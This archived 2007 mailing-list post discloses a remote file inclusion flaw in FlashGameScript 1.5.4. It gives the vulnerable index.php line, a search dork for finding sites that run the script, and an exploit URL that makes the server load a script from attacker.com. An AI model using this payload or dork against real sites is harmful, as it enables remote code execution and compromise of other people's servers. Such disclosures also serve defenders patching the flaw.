|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
FlashGameScript v1.5.4 Remote File Inclusion Vulnerability
malic89
gmail.com
Date: Wed Feb 21 2007 - 07:26:59 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
--------------------------------------------------------
Author : JuMp-Er
Date : feb, 21th 2007
Level : Dangerous
contact: : aH-crew[at]hotmail[dot]com
--------------------------------------------------------
Software description
--------------------------------------------------------
App :FlashGameScript
Version :1.5.4
URL :http://www.flashgamescript.com/
Dork :Copyright © 2006-2007 Powered by FlashGameScript.com version 1.5 All Rights Reserved
Price: :$60
Description :
Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner’s profit with additional plug-in for alternative income opportunities.
-------------------------------------------------------
Vulnerability:
---------------
at index.php line 28: $func =$_GET[func];
---------------
Exploit:
http://www.target.com/index.php?func=http://attacker.com/evil_script?
---------------
Greetz to all members of active. Hacking Crew
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]